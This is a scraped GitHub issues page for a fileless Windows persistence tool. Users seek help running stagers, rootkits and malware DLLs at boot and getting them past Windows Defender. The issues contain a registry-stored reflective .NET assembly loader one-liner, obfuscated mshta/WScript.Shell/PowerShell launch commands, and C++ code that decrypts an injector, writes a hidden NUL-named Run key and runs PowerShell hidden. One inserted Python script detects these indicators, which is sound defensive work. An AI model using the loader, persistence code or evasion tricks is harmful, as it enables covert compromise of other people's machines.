
living-off-the-land's Issues

Example of UI error

Would you be kind enough to show an example of the UI issues in regedit from the null byte key?

Is it possible to make LOTL start 2 exes?

Hi,

Thanks for your work, it's working perfectly for me, but the issue I have right now is that I have one exe that is a stager, and it is supposed to start the rootkit that it downloaded before, but it gets blocked by AV.

It seems quite normal to me, because it was my stager that was starting another exe, but I could not figure out a solution for me.

Can you help me?

Is it possible to explain more how to set our own executable?

Hi,

I understood the payload project was the project executed, but is it possible to explain more how to set our own project?

Is there a way to just add our executable?

Is there any action or characteristics that might reveal the executable?

BR and excellent work

How do I run the payload execution command in PowerShell?

I'm trying to execute the payload that hides inside a registry key, but it cannot; here's what I'm trying:

powershell -Command [System.Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey("Software\Microsoft\Internet Explorer").GetValue($Null)).EntryPoint.Invoke(0,$Null)

It gives me: You cannot call a method on a null-valued expression.

Can't obfuscate OR encrypt run/start commands

I'm thinking it's due to string escapes but I have NO idea. I want to obfuscate it so windows defender doesn't stop execution. I've tried putting the following into Invoke-Obfuscation

powershell "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\"Software\\Microsoft\\Internet Explorer\").GetValue($Null)).EntryPoint.Invoke(0,$Null)"

and put the output in like this (omitting the base64 so it's not giant)

LPCSTR runCommand = "CMD /C \"SET NOZ=(neW-OBJEcT io.CompREssION.dEFlatEstreAm([SystEm.iO.meMOryStREaM][SYSteM.CONVERT]::frOMBASe64StRinG('++nT09l9XJyel/'), [sYsTeM.Io.COMprESsiON.COmpRessioNmODe]::DecomPReSs) ^ | % {neW-OBJEcT SYStem.Io.STReaMrEAdeR($_, [texT.EncodING]::aScIi)} ^ | % {$_.rEaDToend()}) ^ | &($vErBOsepReFeRENcE.TOSTRIng()[1,3] + 'x' -Join '') && mshta.eXE VBScript : CReATeObJECt('WSCRIPT.ShEll').RUn('powershell . (${pshomE}[21] + ${pshoME}[34] + 'X') ((.( '{0}{1}' -f 'gC', 'i' ) ('{2}{0}{1}' -f 'nv:', 'NOZ', 'E')).'valUE')\", 1, TRue)(WINDOw.CLosE)\"";

But I get no output. With any type of obfuscation / encryption. Even tried encrypting at runtime, but:

```cpp
#include <Windows.h>
#include <iostream>
#include <string>
#include <vector>
#include <wincrypt.h>

#include "../Global/NativeRegistry.h"
#include "resource.h"

#pragma comment (lib, "crypt32.lib")

bool EncryptData(const BYTE* pbData, DWORD cbData, std::vector<BYTE>& encryptedData)
{
HCRYPTPROV hCryptProv = NULL;
HCRYPTKEY hKey = NULL;
HCRYPTHASH hHash = NULL;
DWORD dwBlockLen;
DWORD dwBufferLen;
DWORD dwCount;
bool fSuccess = false;

// Get handle to the default provider.
if (!CryptAcquireContext(&hCryptProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT))
{
    std::cerr << "Error during CryptAcquireContext: " << GetLastError() << std::endl;
    goto exit;
}

// Create a hash object.
if (!CryptCreateHash(hCryptProv, CALG_SHA_256, 0, 0, &hHash))
{
    std::cerr << "Error during CryptCreateHash: " << GetLastError() << std::endl;
    goto exit;
}

// Hash data.
if (!CryptHashData(hHash, pbData, cbData, 0))
{
    std::cerr << "Error during CryptHashData: " << GetLastError() << std::endl;
    goto exit;
}

// Create a symmetric key.
if (!CryptDeriveKey(hCryptProv, CALG_AES_256, hHash, 0, &hKey))
{
    std::cerr << "Error during CryptDeriveKey: " << GetLastError() << std::endl;
    goto exit;
}

// Determine size of the encrypted block.
dwBlockLen = 0;
if (!CryptEncrypt(hKey, NULL, TRUE, 0, NULL, &dwBlockLen, 0))
{
    std::cerr << "Error determining size of the encrypted block: " << GetLastError() << std::endl;
    goto exit;
}


encryptedData.resize(dwBlockLen);

// Encrypt data.
if (!CryptEncrypt(hKey, NULL, TRUE, 0, &encryptedData[0], &dwBlockLen, encryptedData.size()))
{
    std::cerr << "Error during CryptEncrypt: " << GetLastError() << std::endl;
    goto exit;
}

fSuccess = true;

exit:
if (hHash)
CryptDestroyHash(hHash);
if (hKey)
CryptDestroyKey(hKey);
if (hCryptProv)
CryptReleaseContext(hCryptProv, 0);

return fSuccess;

}

int CALLBACK WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
// Read Injector.exe from resources
HRSRC injectorResource = FindResourceA(NULL, MAKEINTRESOURCEA(IDR_INJECTOR), "EXE");
if (!injectorResource) return 0;

DWORD injectorSize = SizeofResource(NULL, injectorResource);
if (injectorSize == 0) return 0;

LPBYTE injectorResourceData = (LPBYTE)LockResource(LoadResource(NULL, injectorResource));
if (!injectorResourceData) return 0;

// Decrypt Injector.exe using a simple XOR algorithm
LPBYTE injector = new BYTE[injectorSize];
BYTE xorKey = 0x77;
for (DWORD i = 0; i < injectorSize; i++)
{
    injector[i] = injectorResourceData[i] ^ xorKey;
    xorKey += 5;
}


std::string powershellCommand = "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\"Software\\Microsoft\\Internet Explorer\").GetValue($Null)).EntryPoint.Invoke(0,$Null)";

std::vector<BYTE> encryptedCommand;
if (!EncryptData((const BYTE*)powershellCommand.c_str(), powershellCommand.length(), encryptedCommand))
{
    std::cerr << "Error encrypting PowerShell command." << std::endl;
    return 0;
}


std::string startupCommand = "mshta \"javascript:close(new ActiveXObject('WScript.Shell').run('powershell \\\"";
startupCommand += std::string((char*)encryptedCommand.data(), encryptedCommand.size()); // Add the encrypted command
startupCommand += "\\\",0))\"";


if (!nt_cpp::SetValue(nt_cpp::GetCurrentUserPath() + L"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\0X", nt_cpp::Udc(std::wstring(startupCommand.begin(), startupCommand.end())))) return 0;


std::string runCommand = "\"[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\\\"Software\\\\Microsoft\\\\Internet Explorer\\\").GetValue($Null)).EntryPoint.Invoke(0,$Null)\"";
ShellExecuteA(NULL, "open", "powershell", runCommand.c_str(), NULL, SW_HIDE);

return 0;

}
```

Still nothing. I'm really confused what I'm doing wrong tbh.

Compilation error

My version of Visual Studio 2019 is giving an error when downloading the project. When I downloaded it by git clone, the project gave a compilation error.

Windows defender detection

Trojan:MSIL/AgentTesla.JMX!MTB

amsi: \Device\HarddiskVolume2\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

mshtA "JAvascRIPt:close(new ActiveXObject('WSc'+'riPT'+'.ShE'+'ll').run('pOwE'+'rSH'+'ELl \"[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\\\"SOFTwArE\\\").GetValue($null)).EntryPoint.Invoke(0,$nuLL)\"',0))"

Windows Defender won't run it, is there any alternative?
You have a lot fewer options trying to run fileless...

Can you explain more about the persistence mechanism?

Hey,

I saw this line in LivingOffTheLand.cpp

"if (!nt_cpp::SetValue(nt_cpp::GetCurrentUserPath() + L"\Software\Microsoft\Windows\CurrentVersion\Run\\0X", nt_cpp::Udc(startupCommand))) return 0;"

And it seems that some data is stored in the registry key in the Run folder. But when I try to find the data, there is indeed a key without name or data in it. How is it possible? How can we check this value?

Do you think AV can detect this key?

I want to be able to run two instances on the same computer, and I know for sure that the malware can be stored in just another path than Internet Explorer, but how is it possible to start 2 instances at bootup?

Thanks again for your support, enlighten me, friend!
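The two threads above (the Defender detection report and this question about the Run-key entry) together describe what a defender has to find: a Run value whose name starts with a NUL byte so regedit shows it as an unnamed value with "could not display value", and a command line that chains mshta, WScript.Shell and powershell to load a .NET assembly straight out of a registry value, with token splitting like `'WSc'+'riPT'` to dodge string matching. The following is an added example, not code from this project or from any of the issue authors: a small Python triage routine that normalizes the concatenation obfuscation and flags both the hidden value name and the launch chain. The Run-key contents are a constructed sample embedded in the script; on a real host they would come from a native-API (NtEnumerateValueKey) or offline-hive enumerator, which is assumed and not shown, because the Win32 registry functions stop at the NUL and would never return the full name.

```python
import re

# Constructed sample of what a raw enumeration of
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run might return: (value name, command).
# The second entry mimics the "\0X" value name used by the project and the obfuscated mshta
# command quoted in the Defender issue. None of this was read from a real machine.
SAMPLE_RUN_VALUES = [
    ("OneDrive",
     r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("\x00X",
     "mshtA \"JAvascRIPt:close(new ActiveXObject('WSc'+'riPT'+'.ShE'+'ll').run("
     "'pOwE'+'rSH'+'ELl [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser"
     ".OpenSubKey(\\\"SOFTwArE\\\").GetValue($null)).EntryPoint.Invoke(0,$nuLL)',0))\""),
    ("Updater",
     "powershell -w hidden [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser"
     ".OpenSubKey('Software\\Contoso').GetValue($Null)).EntryPoint.Invoke(0,$Null)"),
]

# 'abc'+'def' or "abc"+"def": a closing quote, a '+', and a re-opening quote of the same kind.
_SPLIT = re.compile(r"(['\"])\s*\+\s*\1")


def normalize_command(cmd: str) -> str:
    """Undo the cheap obfuscations seen in the issues: quote-split concatenation and
    random letter case. Whitespace runs are collapsed so wrapped commands compare equal."""
    joined = _SPLIT.sub("", cmd)
    return re.sub(r"\s+", " ", joined).casefold()


# (indicator label, substrings that must all appear in the normalized command)
COMMAND_INDICATORS = [
    ("mshta launching inline script", ("mshta", "script:")),  # javascript: or vbscript:
    ("WScript.Shell used as process launcher", ("wscript.shell",)),
    ("reflective .NET assembly load", ("reflection.assembly]::load(",)),
    ("payload read from a registry value", ("microsoft.win32.registry", ".getvalue(")),
    ("entry point invoked from memory", ("entrypoint.invoke(",)),
]


def command_indicators(cmd: str) -> list[str]:
    """Return the labels of every indicator present in the command (after normalization)."""
    norm = normalize_command(cmd)
    hits = [label for label, needles in COMMAND_INDICATORS if all(n in norm for n in needles)]
    if _SPLIT.search(cmd):
        hits.append("string-concatenation obfuscation")
    return hits


def value_name_indicators(name: str) -> list[str]:
    """A NUL byte in a value name is what makes regedit show an unnamed entry with
    'could not display value': the Win32 layer treats the name as ending at the NUL,
    while the native API (and the autorun processing) still see the whole value."""
    hits = []
    if "\x00" in name:
        hits.append("NUL byte in value name (hidden from regedit/Win32)")
    return hits


def scan_run_values(values) -> list[dict]:
    """One finding per suspicious (name, command) pair. The name is repr()'d so an
    embedded NUL is visible in any report instead of silently truncating the line."""
    findings = []
    for name, cmd in values:
        hits = value_name_indicators(name) + command_indicators(cmd)
        if hits:
            findings.append({"value": repr(name), "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_run_values(SAMPLE_RUN_VALUES):
        print(finding["value"])
        for hit in finding["indicators"]:
            print("   -", hit)
```

Running it prints two findings: the `'\x00X'` value trips every indicator including the obfuscation check, and `'Updater'` is caught on the reflective-load and registry-read indicators alone even though it uses neither mshta nor any string splitting, which is why matching on the load chain rather than on the exact launcher string is the more durable rule.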

Payload size

Hi, nice code! But I am just wondering how I am supposed to insert a payload into the registry when it's way over the size limit? In the example I think you used MessageBoxA to call the native API, but what if I want to, let's say, download the bytes and inject them into the explorer.exe process, which means this might include multiple API calls? Please correct me if I am wrong on that. The only solution I can think of is to create more registry keys and store them separately?

Error when compiling with my own executable: "The magic number in GZip header is not correct. Make sure you are passing in a GZip stream."

Hello @Ogyeet10 here,

Background

I'm attempting to use LOL to install and persist an application (Payload.exe), which is consistently blocked by Windows Defender despite various attempted workarounds (disabling AV, adding exceptions, etc.). The executable is separate from r77 and LOL and should be persistent on the system.

Issue

After replacing the example executable and code in your LivingOffTheLand project with my Payload.exe and recompiling, the installation on a test VM doesn't seem to run the executable as expected. Manual invocation of the assembly loading script ([Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey("Software\Microsoft\Internet Explorer").GetValue($Null)).EntryPoint.Invoke(0,$Null)) showed why:

Exception calling "Invoke" with "2" argument(s): "The magic number in GZip header is not correct. Make sure you are passing in a GZip stream."

Suspected Issue

This error suggests a problem with how the executable is compressed (or not compressed). Upon reviewing the post-build process code, I noticed that EncryptFile.exe is used with the -e flag but not again with the -c flag for compression, which seems inconsistent with the process intended to handle GZip streams.

Questions

  1. Could the absence of the -c compression flag in the build process be an oversight, or is it intentional?
  2. If it's intentional, could you explain the expected configuration to avoid the GZip header error?
  3. What's generating that error? I don't see any GZip related code in that one-liner.

PS. Sorry about all the issues.

Thanks,
Aidan

No longer works in Windows 11?

Seems like this is patched in Windows 11; calling run() from WScript.Shell results in "Access is denied".

Edit: Why do we have to use mshta anyway? Can't we just directly spawn a PowerShell process?

Edit 2: Oh look at that it's also issue #11, lol.

Is it possible to use your project to start a dll file?

Hi,

I decided that the form of my malware should be a dll because it's not known by AV. In Windows, we can use the command rundll32 to run it.

I could try to start a batch maybe? I understood that the living off the land executable loaded the content of the payload?

Living off the Land exe doesn't start at bootup in Windows VM

Hi,

I ran the Living off the Land exe, and made sure there is the message "could not display value" when viewing the registry.
When I run the removal tool, it says that it was removed successfully, so it seems to work.

Besides that, I know for sure that the Living off the Land exe did not work because the stager did not run (it's supposed to download the rootkit files).

Am I doing something wrong? Does it work on your system?
I use a Windows VM, and I have a hard time trying to just make a program run at bootup, so maybe it comes from there...

BR
